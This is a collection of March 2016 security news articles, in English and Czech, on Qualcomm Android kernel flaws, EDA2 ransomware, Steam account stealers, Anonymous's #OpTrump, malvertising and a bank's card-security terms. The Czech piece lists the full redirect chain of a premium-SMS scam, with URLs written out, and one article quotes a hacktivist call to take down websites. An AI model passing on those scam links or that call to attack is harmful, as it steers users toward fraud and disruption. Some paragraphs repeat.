"Smartphones aren't the only problem here," said Trend's Noah Gamer. "Qualcomm also sells their SoCs to vendors producing devices considered part of the Internet of Things, meaning these gadgets are just as at risk."
"If IoT is going to be as widespread as many experts predict, there needs to be some sort of system in place ensuring these devices are safe for public use. Security updates are an absolute necessity these days, and users of these connected devices need to know what they're dealing with."
Whatever be the reason: if security patches are not available for your device model or take too long to arrive, in both the cases it gives miscreants time to exploit the security holes to gain control of your device.
However, some users are lucky to choose Google’s handsets that get their patches direct from the tech giant automatically, making them safe from the vulnerabilities. The handsets include Nexus 5X, Nexus 6P, Nexus 6, Nexus 5, Nexus 4, Nexus 7, Nexus 9, and Nexus 10.
All of the smart devices using the Qualcomm Snapdragon 800 series, including the 800, 805 and 810 and running a 3.10-version kernel are affected by the vulnerabilities.
The vulnerable code is present in Android version 4 to version 6. In the tests, researchers found Nexus 5, 6 and 6P, and Samsung Galaxy Note Edge using vulnerable versions of Qualy's code.
Though the researchers do not have access to every Android handset and tablet to test, the list of vulnerable devices is non-exhaustive.
Since the researchers have not disclosed full details about the flaws, the short brief about the vulnerabilities is as follows:
1. Qualcomm-related flaw (CVE-2016-0819): The vulnerability has been described by the researchers as a logic bug that allows a small section of kernel memory to be tampered with after it is freed, causing an information leakage and a Use After Free issue in Android.
2. The flaw (CVE-2016-0805) is in Qualcomm chipset kernel function get_krait_evtinfo: The get_krait_evtinfo function returns an index into an array used by other kernel functions. With the help of carefully crafted input data, it is possible to generate a malicious index, leading to a buffer overflow.
3. Gaining root access: Using both the flaws together on vulnerable devices, attackers can gain root access on the device.
The researchers will disclose the full details of exactly how to leverage the bugs at the upcoming Hack In The Box security conference in the Netherlands to be held in late May 2016.


EDA2, derived from the educational ransomware, is easy to break
16.3.2016 Virus

The new strain of educational ransomware EDA2 is infecting systems in the wild, but experts discovered that it is quite easy to neutralize.
Do you remember the EDA2 ransomware?

It is one of the educational ransomware developed by the security expert Utku Sen, now a new variant of the EDA2 educational ransomware appeared in the wild and the good news is that this variant is quite easy to neutralize.

The EDA2 ransomware encrypts victims’ files using AES encryption, then it appends the .locked extension to them. In a way similar to other ransomware, EDA2 also drops notes on the infected machines and informs users that they need to pay .5 bitcoins to restore their files.

According to the experts at Bleeping Computer, the educational ransomware has already infected more than 650 machines and the analysis of the Bitcoin address associated with the ransom request revealed that only 3 victims have paid.

The crooks are targeting online gamers, the EDA2 educational ransomware spread via a link associated with a YouTube video that explains how to crack the Far Cry Primal videogame. When victims try to execute the file crack are infected by the ransomware that encrypts users’ files.

EDA2 educational ransomware

The new strain of educational ransomware EDA2 is infecting systems in the wild, but experts discovered that it is quite easy to neutralize.
Do you remember the EDA2 ransomware?

It is one of the educational ransomware developed by the security expert Utku Sen, now a new variant of the EDA2 educational ransomware appeared in the wild and the good news is that this variant is quite easy to neutralize.

The EDA2 ransomware encrypts victims’ files using AES encryption, then it appends the .locked extension to them. In a way similar to other ransomware, EDA2 also drops notes on the infected machines and informs users that they need to pay .5 bitcoins to restore their files.

According to the experts at Bleeping Computer, the educational ransomware has already infected more than 650 machines and the analysis of the Bitcoin address associated with the ransom request revealed that only 3 victims have paid.

The crooks are targeting online gamers, the EDA2 educational ransomware spread via a link associated with a YouTube video that explains how to crack the Far Cry Primal videogame. When victims try to execute the file crack are infected by the ransomware that encrypts users’ files.

EDA2 educational ransomware

The author of the malware in a bold manner writes in the note that he would never get caught by the authorities.

Utku Sen, the developer that created the educational ransomware, seems to have deliberately inserted security flaws in both the Hidden Tear and EDA2 to sabotage cyber criminals using the proof-of-concept ransomware.

The Sen’s plan worked with the Hidden Tear allowing the recovery of the file encrypted by the Linux.Encoder and Cryptear.B ransomware, meanwhile failed with EDA2.

The developer also inserted vulnerabilities in the EDA2’s control script in order to retrieve decryption keys allowing victims to restore their files.

The keys are then published online giving the opportunity to the victims to restore their files by using the Hidden Tear Decryptor.

Other educational ransomware developed by the Hidden Tear are Magic, Linux.Encoder, and Cryptear.B, all these threats were deliberately affected by a flaw that allows researchers easily to decrypt documents.


Malware targeting Steam accounts, a growing business

16.3.2016 Virus

Security expert published an interesting analysis of malware targeting the Steam gaming platform and evolution of threats through the last few years.
It is emergency, malware targeting the Steam accounts are increasing as never before over the last months. The popular gaming platform is a privileged target for cyber criminals, Steam is owned by Valve and account for nearly 140 million users. The company estimates that nearly 77,000 accounts are hijacked and pillaged each month.

“We see around 77,000 accounts hijacked and pillaged each month. These are not new or naïve users; these are professional CS:GO players, reddit contributors, item traders, etc. Users can be targeted randomly as part of a larger group or even individually. Hackers can wait months for a payoff, all the while relentlessly attempting to gain access. It’s a losing battle to protect your items against someone who steals them for a living.” states the company in a blog post.

The security expert at Kaspersky Lab, Santiago Pontiroli, and Bart P, an independent security researcher, published an interesting analysis of malware targeting the Steam gaming platform and evolution of threats through the last few years.

In the recent months, the researchers observed a spike in the infections caused by a data stealer specifically designed to target the accounts on the gaming platform, dubbed Steam Stealer.

Steam Stealer first appeared on a forum in the Russian underground, it is advertised as a customizable threat that is offered for sale with upgrades and manuals.

“Adding new features is simple. The average developer just needs to select their favorite programming language and know just enough about Steam’s client design and protocol. There are many APIs and libraries available that interface seamlessly with the Steam platform, significantly reducing the effort required.” states the analysis.

Steam stealer

The crooks use to spread the Steam stealer malware via bogus websites or sending direct messages to victims.

Steam stealer is very cheap, the cost of a build ranges from $3 and goes up to $30 USD, some sellers offer it as a malware-as-a-service tools.

“However, when it comes to these types of malicious campaigns we usually see prices starting in the range of $500 dollars (taking as a reference earlier ransomware-as-a-service markets).” explained Pontiroli and Bart P.

The researchers noticed a significant difference in the way criminals dropped the malware over the time. In the past they served the malware on users via URL shortening services, cloud storage services like Dropbox and Google Docs, and phony game servers and fake voice software sites. Recently attackers started using fake Chrome extensions and gambling sites.

A short rundown of past trends:

Use of obfuscators to make analysis and detection harder.
Use of file extensions hidden by default by Windows (fake ‘screensaver’ files).
Use of NetSupport added (providing remote access to the attacker).
Use of fake TeamSpeak servers.
Use of automatic Captcha bypass (DeathByCaptcha and others).
Use of fake game servers (Counter-Strike: Global Offensive most notably).
Use of Pastebin to fetch the actual Steam Stealer.
Use of fake screenshot sites impersonating Imgur, LightShot or SavePic.
Use of fake voice software impersonating TeamSpeak, RazerComms and others.
Use of URL shortening services like bit.ly.
Use of Dropbox, Google Docs, Copy.com and others to host the malware.
Current trends are as follows:

Use of fake Chrome extensions or JavaScript, scamming via gambling websites.
Use of fake gambling sites, including fake deposit bots.
Use of AutoIT wrappers to make analysis and detection harder.
Use of RATs (Remote Access Trojans) such as NanoCore or DarkComet.
The experts explained that there are counter-measure that the Valve’s Steam has implemented to prevent attacks on its accounts including:

Two-factor authentication either by email or mobile application.
Blocking URL’s throughout Steam.
Nickname censorship (Steam/Valve).
Captcha on trades (briefly), and then bypassed.
Limited accounts introduced.
Steam e-mail confirmations for utilizing the market and trading items.
Verifying e-mail address.
$5 USD purchase to combat ‘free abuse’ accounts (expanded on limited accounts).
Information about who you are trading with (record).
Market will become blocked when logging in from new devices, changing your profile password etc.
Steam mobile trade confirmations.
Steam account recovery via phone number.
Restrict chat from users who do not share a friends, game server, or multi-user chat relationship with you.
More restrictive block referral of spam and scam sites.
Trade hold duration (15 days).
The experts explained that Steam implemented the above measured as a deterrent.

“We have listed all the options Steam offers users to protect their accounts. Remember that cybercriminals aim for numbers and if it’s too much trouble they’ll move on to the next target. Follow these simple recommendations and you will avoid becoming the low hanging fruit.”

No doubt, the number of attacks against the platform will continue to increase despite the effort spent by the company.


Dear Donald Trump Anonymous plans to destroy your campaign starting April 1
16.3.2016 Hacking

Anonymous has declared war on Donald Trump, the hacking collective will start a new powerful campaign starting April 1.
The hacktivists have already expressed their disappointment on the presidential candidate’s controversial campaign rhetoric that resulted in a series of a series of attacks.
The attack against Trump started in 2015 when Anonymous defaced the website Trump.com with a tribute to Jon Stewart.

“Mr Stewart, we at @TelecomixCanada would like to take this opportunity to thank you for the many happy years of quality journalism and entertainment you and your team have undertaken at Comedy Central,” reads a letter on Trump’s site.

In December, the reprisal became more intense following the Donald Trump’s call for a sweeping ban on Muslims entering the United States soil. Trump’s declaration raised the protest around the world from politicians, hacktivists, to ordinary citizens.

anonymous Donald Trump 2
Anonymous has joint in the protest, declaring war against the presidential candidate, the hackers published a video message announced their operation against the campaign of the US billionaire.

“Donald Trump, it has come to our attention that you want to ban all Muslims to enter the United States. This policy is going to have a huge impact. This is what ISIS wants. The more Muslims feel sad, the more ISIS feels that they can recruit them. Donald Trump, think twice before you speak anything. You have been warned, Donald Trump.” states the Video Message.
The group officially launched the #OpTrump hacking campaign against Donald Trump, a DDoS attack hit the website for New York City’s Trump Towers and the website remained offline for hours.

Now Anonymous has announced a new initiative against Donald Trump and his campaign, the collective plans to coordinate a series of attacks on its websites starting April 1.

The group announced its re-engagement of “OpTrump” in a video message, the collective wants to synchronize the efforts of the numerous collectives against Donald Trump and his electioneering organization.

The Anonymous spokesman in the video motivated the planned attacks as a response to the Donald Trump’s “appalling actions and ideas” in conducting the presidential campaign.

“We have been watching you for a long time and what we’ve seen is deeply disturbing. You don’t stand for anything but your personal greed and power.”

“This is a call to arms. Shut down his websites, research and expose what he doesn’t want the public to know. We need you to dismantle his campaign and sabotage his brand.”“We need to dismantle his campaign and sabotage his brand,” said Athe nonymous spokesman.

“We need to dismantle his campaign and sabotage his brand,” said Athe nonymous spokesman.
Of course, Trump is aware that is a target and hired experts to protect his campaign.

We have to consider that today Internet is the privileged instrument of politicians and any kind of interference with online activities of the candidates could have unpredictable effects on the final voters’ decision.

A couple of weeks ago, alleged members of the Anonymous group hacked the Donald Trump ‘s voicemails. Journalist at Gawker received an email by the hackers containing recordings from Donald Trump ‘s voicemail inbox.

Let’s see what will happen.


Several Top websites as BBC, New York Times AOL, MSN and others victims of malvertising
16.3.2016 Virus

Security experts from various firms have discovered a malvertising campaign that has been placing malicious ads on very popular websites like BBC and NYT.
As the title says, a number of popular websites, including The New York Times, BBC, The Hill, Newsweek, AOL, MSN, and several others, were victims of a malvertising campaign.

The attack hijacked the ad network from each of these websites, crooks used the Angler Exploit Kit to deliver Ransomware to the people visiting these websites.

Investigations conducted by experts at Trustwave, Trend Micro, and Malwarebytes reported a spike in malicious traffic over the weekend.

There is no clue if this was part of a larger coordinated effort, but the conclusion is that whoever did this, knew exactly what they were doing.

“We have just discovered an advertising campaign that has been placing malicious advertisements on very popular websites both in the US and internationally. “answers.com” (Alexa rank 420 Global and 155 in the US), “zerohedge.com” (Ranked 986 in the US) and “infolinks.com” (Ranked 4,649 Internationally) are only some of the big names that were recently found redirecting visitors to the Angler exploit kit through a malicious advertising campaign, and though malicious advertising has become part of our daily lives in the world of web security, this story is a little different.” states a blog post published by Trustwave.

“These days we’re practically used to the “standard” Malvertising campaigns where the placement of malicious advertisements on known ad provider networks leads potential victims to an exploit kits’ landing page.” Continues the post.

According to the experts at Trustwave, an experienced actor exploited an expired domain of a small but probably legitimate advertising company to launch the attack.

“This provides them with high quality traffic from popular web sites that publish their ads directly, or as affiliates of other ad networks, which our research has shown to lead to the Angler EK.” continues the post

Trend Micro reported that the attacks based on the Agler exploit kit increased in a significant way since March 9.
malvertising campaign March 2016

The innovation, in this case, was that crooks used recently expired domain as part of their campaign. By acquiring a recently expired domain, the threat actors are able to bypass some checks because the traffic appears as legit.

Malwarebytes connected the registration of two rogue domains to the attacks relaying on the Angler Exploit kit that hit during the week the visitors of the New York Times, MSN, BBC, AOL, The Hill, Newsweek, NFL.com, the Xfinity customer portal (my.xfinity.com), Realtor.com, and The Weather Channel.

They also explain very well, in an image what happens, when a user accesses one of this targeted websites, in this case assuming that DailyMail.com ads were compromised:

malvertising campaign March 2016 attack scheme

Crooks have chosen Ransomware to infect the victims because it offers a fast way to cash out the efforts.

As more and more variants of Ransomware appear, and since there are no costs once they pay the initial fee, we will keep see a rise in Ransomware during this year.

Please if you want to get more details feel free to access Malwarebytes page, TrendMicro, and Trustwave.


Podvodné reklamy straší virovou nákazou, šíří je i reklamní síť Googlu

16.3.2016 Viry

Přes některé české i zahraniční reklamní systémy se v těchto dnech šíří malvertising, který se snaží uživatele vyděsit tím, že mají napadený smartphone.
9:02 – doplněno vyjádření firmy R2B2

„Zjistili jsme, že jste nedávno navštívili pornografické stránky. 28,1% z mobilních dat je obtížné infikován škodlivými viry 4. Viry mohou poškodit SIM kartu ! Vaše soukromá data vyprší! Fotografie a kontakty jsou ztraceny!“

Lámaná čeština, hrozba, že „vaše soukromá data vyprší“, pokud nic neuděláte, a odkaz vedoucí až k webu, který po vás bude chtít telefonní číslo. Na české mobilní uživatele v uplynulých dnech zamířila vlna falešných reklam, které se šíří prostřednictvím mobilních reklamních systémů. Podobný případ ale hlásí i velké zahraniční weby.

Na aktuální malvertising nás na Facebooku upozornil Pedro Palcelloni. Falešná varování před virovou nákazou v jeho telefonu se mu zobrazila při čtení článků na iDNES.cz.

Podle projektového manažera iDNES.cz Pavla Kočičky vydavatelství o problému ví a od začátku jej řeší. Upozornění se podle něj šířila prostřednictvím falešných reklamních formátů v mobilních programatických systémech, které vydavatelství Mafra na svých webech využívá. Jedním z provozovatelů, které Mafra využívá, je podle něj Google, dalším česká síť R2B2.

„Sestřelili jsme reklamu i všechny ostatní, které vedou na doménu .click a zakázali jsme reklamy z kategorie ‚security‘. Google o tom ví od předvčerejška, že jim tam takový hnus protéká, pravidelně jim to hlásíme,“ popsal v komentáři na Facebooku.

„Podvodné reklamy jsou bohužel fenomén současných automatizovaných sítí pro prodej online reklamy. Forma s automatickým přesměrováním na telefonech s operačním systémem Android je dosud její nejagresivnější podobou. Jako vydavatel hlídáme využívání svého reklamního prostoru a podvodné nebo podezřelé reklamy ihned blokujeme. Problém zároveň řešíme v úzkém spojení s poskytovateli reklamního obsahu, kteří na potírání těchto online fraudů dedikovali celé týmy i výpočetní farmy,“ reaguje také Jan Malý, projektový manažer, který má mobilní weby v iDNES.cz na starost.

O reakci jsme požádali jak český Google, tak R2B2, ale zatím jsme od nich nedostali žádné upřesňující informace.

Doplnění 9:02 – Odpověď z R2B2 dorazila těsně po publikování tohoto textu:

„Z našich reklamních kanálu tyto zavirované reklamy nešly, nicméně z profesionálních důvodů jsme se snažili vypátrat, odkud se vir na weby Mafry dostal a dle našich zjištění šel z reklamních jednotek společnosti Google, které Mafra nasazuje na své stránky mimo naši spolupráci,“ napsal Lupě jednatel R2B2 Martin Čelikovský.

Reklama podle něj byla na první pohled podezřelá. „Už proto, že byla podivně cílená (angličtina, dovolená) a byla nasazena s omezením frekvence 1× na uživatele s velmi vysokou nabídkou v aukci. Necílenou reklamu tohoto typu se pouštět takto nemůže vyplácet, což upřelo naši pozornost na tuto reklamu a podezření jsme vzápětí potvrdili,“ dodává.

Autor: R2B2
„Na celé skutečnosti je podivné, že reklama prošla kontrolou společnosti Google. Ale jelikož to nebyl kanál v rámci spolupráce s naší společností, tak nejsme obeznámeni s podrobnostmi,“ doplňuje Čelikovský.

Jak útok funguje

Na falešná varování se samozřejmě nevyplatí klikat. Podvržené reklamy na mobilních telefonech používají taktiku falešných antivirů, která dlouhé roky „úspěšně“ funguje na počítačích. Nic netušící uživatelé se nechají snadno nachytat a v panice věří, že se jim v počítači objevil virus. A ve skutečnosti ho tam ochotně pustí.

Na počítači podobné věci mívají fatální následky – pokud máte děravý Flash nebo Javu, nebo jinou neošetřenou zranitelnost. Na iOSu či Androidu hrozí poměrně málo, tedy pokud si případné následné svinstvo nepustíte dobrovolně do systému. Ale jak uvidíme níže, ne vždy je cílem těchto aktivit dostat do mobilu či počítače malware.

Ze screenshotu to sice není vidět, ale adresa je například paly.google.com.store.apps.
deepmind.click/
3b5MBivfkif2mmhxluoImYurMuwz/cz/ a tlačítko pro „odstranění“ viru vede na cldlr.com/?a=33580&c=92366&s1=3Bcz, kde najdete pár dalších přesměrování (varm.coolsafeads.com/?kw=-1&s1= a poté 4ugzz.sexy.0367.pics se stažením REI495slmCZ.html z téže domény. A přesměrováním zdaleka není konec, dostanete se nakonec na reimageplus.com a v celém tom řetězci je otázka, kolik z těch webů je zneužitých/hacknutých. Pokud budete výše uvedené odkazy zkoumat, zjistíte, že jde navíc jenom o jednu z možných cest.

Konečná destinace každopádně je kdesi na z.dicemob.mobi (patří Zamano.com, poskytovateli mobilních/platebních služeb) a stránka tam po vás bude chtít telefonní číslo.

Pokud ho důvěřivě sdělíte, naletíte na aktuálně nejčastější způsob podvádění – posílání zpoplatněných SMS. Když se podíváte do patičky, zjistíte, že se web tváří, jako by probíhal přes vcelku jasně identifikovatelnou službu působící v Česku.

Cena za jednu SMS je 99 Kč a týdně jich dostanete až deset. Než si tedy uvědomíte, co se stalo, můžete přijít o hezkých pár set korun.

Po vyplnění telefonního čísla vám přijde SMS (případné „Klikněte zde“ otevírá odeslání SMS) a pokud na ni odpovíte, budou vám chodit další a další, které už budou zpoplatněné. Prostě si podvodem objednáte službu, která s viry a bezpečností vašeho telefonu nemá nic společného.

Zasaženy i New York Times

Podle aktuálních zpráv to vypadá, že současná kampaň není jen problémem České republiky. Podle bezpečnostní firmy Malwarebytes obdobné falešné reklamy ohrožují také uživatele velkých zahraničních webů jako je nytimes.co, bbc.com, nfl.com nebo newsweek.com.

I tady jde o podvodné reklamy šířené několika reklamními sítěmi – mezi jejich provozovatele patří Google, AppNexus, AOL či Rubicon. Podvržené reklamy se uživatelům snaží do zařízení instalovat ransomware.

Podobné útoky nejsou ojedinělé – a v Další příklad malvertisingu: na Forbes.com byl v některých reklamách malware zjistíte, že se často týká i renomovaných titulů. Potenciální nebezpečnost reklam je často jedním z argumentů, proč je na internetu blokovat.


Bez antiviru a firewallu platební kartu na internetu používat nesmíte

16.3.2016 Bezpečnost

Četli jste podmínky používání vaší platební karty? Možná budete překvapeni, co všechno podle nich musíte nebo nesmíte dělat při platbách na internetu.
Vlastně to vypadá jako docela dobrá absurdita – kdyby ovšem nešlo o tak důležitý dokument, jako jsou obchodní podmínky pro používání platebních karet. Svá pravidla nedávno aktualizovala tuzemská Fio banka (pro nové smlouvy platí od 8. března, pro dříve uzavřené začnou platit od 9. května). A když se do desetistránkového materiálu začtete, nestačíte se divit, co všechno musíte udělat, abyste jejím podmínkám vyhověli.

Podivil se i bezpečnostní expert Michal Špaček, který jinak obvykle volá po tom, aby se lidé na internetu chovali bezpečněji. „Dozvěděl jsem se například to, že když na počítači nemám antivir, tak ty obchodní podmínky porušuju. A taky bych je porušoval, kdybych nesledoval informace o virech a spyware. Ale to trochu sleduju, takže cajk. Jenže kvůli tomu občas navštěvuju i neznámé stránky, různé blogy nebo články, ostatně, takhle vlastně funguje tenhleten web, že. A tím už zase ty podmínky porušuju,“ upozornil na podmínky Fio banky na svém facebookovém profilu.

Kompletní podmínky najdete na webu banky (PDF) a novinkou v nich je zejména oddíl IVa, který si stojí za to přečíst. Začíná totiž výslovným upozorněním, že všechny v něm napsané věci jsou pro klienta povinné a musí se jimi řídit. Jenže pokud byste je vzali doslova, asi byste kartu spíš vrátili, protože se z jejího používání stává noční můra.

Firewall, antivir a anti-spyware

Některé povinnosti vypadají docela rozumně: klient třeba nesmí používat kartu na veřejně přístupných počítačích (třeba v internetových kavárnách). Jenže pak začne přituhovat: podle Fio banky má klient povinnost „legálně zabezpečit zařízení, prostřednictvím kterého se rozhodne používat platební kartu, firewallem, antivirovou a anti-spyware ochranou, a tyto ochranné prvky pravidelně aktualizovat.“ Ano, pokud nemáte na počítači, kde kartou platíte, firewall, antivir a antispyware, které pravidelně neaktualizujete, porušujete obchodní podmínky.

Ty ovšem porušujete i v případě, že na onom zařízení nemáte „legálně pořízený a pravidelně aktualizovaný operační systém“. Stačí tedy zmeškaná aktualizace a… porušujete podmínky. Máte také „povinnost pravidelně sledovat zprávy výrobce operačního systému o opravách chyb a nedostatků tohoto operačního systému a tyto opravy včas instalovat“.

Nainstalovali jste si někdy nějaký na internetu volně dostupný program? Pokud si nemůžete „…být s dostatečnou mírou jisti, že neobsahují viry nebo spyware“, porušujete podmínky. Smíte také „navštěvovat pouze známé, důvěryhodné a bezpečné stránky na internetu a neotvírat nevyžádané emaily, emaily od neznámých adresátů a emaily s podezřelým názvem nebo obsahem“. A v e-mailové schránce musíte používat spam filtr.

Povinnost mít nainstalovaný antivir, firewall a anti-spyware u Fio banky kupodivu platí i u „vyspělejších mobilních zařízení“ – tedy smartphonů a tabletů „s operačním systémem iOS, Android, Windows Phone a jiným operačním systémem“ (vypadá to, že někdo zkopíroval podmínku z části o PC, aniž by uvažoval o odlišnostech těchto zařízení). Stahovat aplikace z jiných než oficiálních obchodů je podle banky nežádoucí, ale i když se chováte žádoucím způsobem (tedy nestahujete mimo oficiální místa), Fio banka vás upozorní, že je to k ničemu, protože „klient nemůže spoléhat na kontrolu prováděnou provozovatelem operačního systému ve vztahu ke všem aplikacím.“

Zajímalo by mě také, jak si obyčejný laický uživatel poradí s následujícím odstavcem: „Klientovi se doporučuje, aby si před každým zadáním důvěryhodných údajů ověřil, že zařízení používá DNS překladače podporující DNSSEC, a prohlížeč si nastavil tak, aby sám prováděl DNSSEC ověřování.“ I když jde tady jen o doporučení, podle úvodního odstavce i tohle patří mezi povinnosti klienta. A pokud DNS nerozumí, ukládá mu Fio banka v následujícím odstavci další povinnost: doporučuje (tak je to povinnost, nebo doporučení?) „…obrátit se s požadavkem na zabezpečení zařízení a jeho případného komunikačního příslušenství na odborníka.“

Kdo zaplatí škodu

Abychom si dobře rozuměli: skoro všechna výše uvedená opatření skutečně mohou zvýšit vaše bezpečí na internetu, o tom není pochyb. A podle toho, co říká mluvčí Fio banky Zdeněk Kovář, je cílem podmínek přimět klienty chovat se obezřetně při používání platebních karet. „Domníváme se, že rozdělení odpovědnosti podle sféry vlivu je spravedlivé. Banka zajistí své systémy, servery, bankomaty atd. A klient zajistí svá zařízení. Jistě nelze od banky (a zejména od nízkonákladové banky) očekávat, že zajistí dostatečné zabezpečení všech počítačů, tabletů či mobilních telefonů, které klient využívá pro přístup do banky nebo k provádění internetových transakcí platební kartou. Toto musí zajistit sám klient. Proto naše obchodní podmínky obsahují specifikaci toho, co považujeme za dostatečné zabezpečení,“ argumentuje Kovář.

Problém je v tom, že tady nejde o tradiční bezpečnostní doporučení, jejichž dodržování záleží na klientovi. Fio banka všechna výše popsaná opatření dává klientovi jako povinnost a zahrnula je do závazných všeobecných obchodních podmínek. Kromě toho, že jde o materiál, který si málokdo přečte, takže jeho dopad na změnu chování uživatelů bude pravděpodobně limitně blízký nule, jde taky o součást smlouvy, a to, co je v něm napsané, nelze brát na lehkou váhu.

Podle sekce VII, odstavce 4, totiž „majitel účtu odpovídá za škodu způsobenou porušením svých povinností uvedených ve smlouvě nebo podmínkách, není-li stanoveno jinak.“ A v dalším odstavci se dozvíte, že „majitel účtu odpovídá za škodu z neautorizovaných platebních transakcí v plném rozsahu, pokud škodu způsobil svým podvodným jednáním nebo úmyslně či z hrubé nedbalosti porušil některou z jeho povinností vyplývající z čl. III, IV a V podmínek…“

Pokud tedy výše popisovaná opatření doslova nedodržujete a někdo vaši kartu zneužije, máte zaděláno na potenciální problém: banka se může snažit zbavit své odpovědnosti za ztrátu z neautorizovaných (čili podvodníky provedených) plateb. Není samozřejmě jisté, že by banka případný soudní spor s vámi vyhrála, ale vyloučené to také není.

Kontrola jednou denně

Podle zákona o platebním styku (284/2009 Sb.) nese klient v případě zneužití ztracené nebo ukradené karty na případné škodě spoluúčast do výše 150 eur (platí to pro všechny transakce do chvíle, než krádež nebo ztrátu karty bance oznámíte – proto je důležité podobné události nahlašovat co nejdříve).

Podle §116 odstavce 1 b) ale tento limit neplatí, pokud klient „…tuto ztrátu způsobil svým podvodným jednáním nebo tím, že úmyslně nebo z hrubé nedbalosti porušil některou ze svých povinností stanovených v § 101.“ A paragraf 101 říká, že uživatel má povinnost „používat platební prostředek v souladu s rámcovou smlouvou, zejména je povinen okamžitě poté, co obdrží platební prostředek, přijmout veškerá přiměřená opatření na ochranu jeho personalizovaných bezpečnostních prvků.“

Nové podmínky Fio banky se přitom v českém prostředí zdají být poměrně unikátní. Nezkoumali jsme všechny banky, ale v obchodních podmínkách asi desítky těch, které jsme prostudovali, na povinné používání antiviru apod. nenarazíte (Komerční banka jej doporučuje ve svém Průvodci k platebním kartám).

Doplnění 12:00: Jak nás upozornil jeden ze čtenářů, podobné požadavky na své klienty používající internetové bankovnictví ve všeobecných podmínkách klade i Equa bank (PDF).

Obvyklé jsou povinnosti chránit PIN a nikomu ho neříkat a „…zejména nepsat PIN na platební kartu, její obal nebo jiný předmět, který nosíte společně s platební kartou, chránit zadávání PIN před odpozorováním z okolí apod." (Česká spořitelna, PDF) nebo chránit kartu před krádeží a „před přímým působením magnetického pole, mechanickým a tepelným poškozením“ (ČSOB, PDF).

Banky také obvykle trvají na povinnosti, že uživatel musí pravidelně kontrolovat, že kartu pořád má a že ji nikdo nezneužil – podle Komerční banky (PDF) to má dělat „soustavně“, podle ČSOB nebo Fio banky to musí dělat minimálně jednou denně.

Jde o celou řadu požadavků, u kterých banka za normálních okolností nemá šanci ověřovat, že je skutečně děláte. „Kontrolu minimálně jednou denně považujeme za rozumný požadavek. Banka nekontroluje ani nevyžaduje, aby to držitel karty jakkoli prokazoval,“ uvádí na dotaz mluvčí Kovář. Nicméně opět ve spojení s tím, že případnou krádež karty musíte nahlásit bezodkladně, se tu rýsuje zajímavá možnost: co když na ni přijdete později a nahlásíte ji třeba až za dva dny? Banka to může považovat za porušení podmínek a tím pádem vám může zkusit upřít ochranný 150eurový limit.

Stejně tak podle něj Fio banka neověřuje, jestli její klienti dodržují zásady na ochranu svých počítačů a smartphonů. V případě, že dojde na krádež, zneužité nebo podvodné transakce, ale může být vše jinak. „Banka nemá možnost kontroly. Pokud ale fraud vyšetřuje Policie ČR, tak je možné, že v rámci vyšetřování počítač postiženého zkontroluje,“ dodává mluvčí.


After Apple, WhatsApp Under Fire from US Govt Over Encryption
15.3.2016 Apple
Before winding up the dispute of Apple and FBI over encryption, another buzz on the Whatsapp Snooping is now the hot debate on the court bench.
In the wake of WhatsApp's move to offer end-to-end encryption to text messages as well as VoIP calls made through its app, federal authorities have not been able to execute wiretapping warrants on WhatsApp users.
Though the US Department of Justice was discussing how to proceed with a continuing criminal investigation, the government is considering legal proceedings similar to those involved with Apple.
According to the New York Times, as recently as this past week, a federal judge had approved a wiretap in a criminal investigation, but WhatsApp's encryption hindered investigators.
Since any court officials have not made a final decision, the Department of Justice is very keen to drag Whatsapp into the Encryption fight war zone similar to the ongoing San Bernardino case.
In San Bernardino case, the DoJ was granted a court order to force Apple to create a special version of iOS that could defeat the encryption on a seized iPhone 5C belongs to one of the dead terrorists named Syed Rizwan Farook.
Apple has vowed both publicly as well as in court papers to fight the court order as intensely as possible, citing security concerns, but the battle between Apple and the FBI is not ending anytime soon.
Why was WhatsApp not Targeted Before?
When Whatsapp was launched in January 2010 by Brian Acton and Jan Koum, it did not initially concern about any privacy features. So there were no opinions to implement cryptographic services at that time.
This relieved the Department of Justice and federal agencies as they could see a clear pathway for snooping WhatsApp users without any legalities.
WhatsApp, now owned by Facebook, had also been criticized before for not adopting a reliable end-to-end communication that secures its user's privacy.
Whatsapp Filled the Security Holes in its Communication
Soon after the tremendous growth of Whatsapp, Facebook acquired the popular messaging service for $19 Billion in February 2014 and WhatsApp partnered with Open Whisper system and developed an end-to-end communication two years back.
This development thwarted DoJ officials and others federal authorities from eavesdropping WhatsApp users' communications for snooping purposes.
Currently, Whatsapp is not involved in any of the criminal cases prevailing in the court, except a Brazilian drug trafficking case, but still court officials debate to foresee the chance of this widely used app adoption by criminals shortly for coordinated attacks.
Obsolete Order Remains Ineffective
As noted by the Times, Wiretap order from the federal judges could not penetrate the end-to-end encrypted communication, as these were used as a valuable investigative tool in the olden time, when people used landline phones that were easy to tap.
Over the past year, WhatsApp has been upgrading encryption for its messages and VOIP calls. All WhatsApp messages sent between Android devices are end to end encrypted since past two years, and between iOS devices since last year.
This simply means that neither WhatsApp nor even its parent company Facebook can access their users' contents in plaintext, making it impossible for DoJ as well to read or eavesdrop, even with a court's wiretap order.
So, this is the time to scrap such orders from the United States Federal Laws.
However, the government has always seemed to enforce such laws on companies that provide privacy protections to its customers.
Recently, a Brazilian Facebook executive was arrested for the company's failure to comply with a federal court order to turn over WhatsApp data.
Apple is also fighting one such court order with the Federal Bureau of Investigation (FBI).
What if the FBI wins the Case?
If Apple is going to head node a "Yes" to the FBI officials, there will be no way out for the users to secure their privacy and the feds will force Apple to unlock more iPhones.
Moreover, if Apple turns to agree, the Federal officials would next dismantle the Whatsapp privacy by enforcing such laws.
As a result, again new apps would mushroom in the digital world which quotes "Security and Privacy" in their products and would again end up in the melodrama of Federal Officials.
Slowly, this would vanish the privacy of netizens and adversely affect the businesses, customers as well as the US government who rely on strong encryption to help protect their information from hackers, identity thieves and foreign cyber attacks.
Moreover federal officials do not realize the fact that their data would also be open for snooping, even if they issue any private "No-Trace" agreements with any agency.
So let's see if any privacy concern movement is being made against Whatsapp or any other tech giant that ensures its users security and privacy in near future.


Fujitsu targets payment industry with PalmSecure Technology
15.3.2016 Security

Fujitsu has announced plans to launch its digital payment system PalmSecure Technology in Europe that is a security solution for biometric identification
Fujitsu has announced plans to launch its digital payment system PalmSecure in Europe that is a security solution for biometric identification, which is offering the perfect user authentication for payment scenarios. It operates touchless, highly reliable, hygienic, and super-fast. The biometric authentication based on Palm vein recognition takes less than one second and can definitely enter the next level of payments soon.

PalmSecure Technology 1

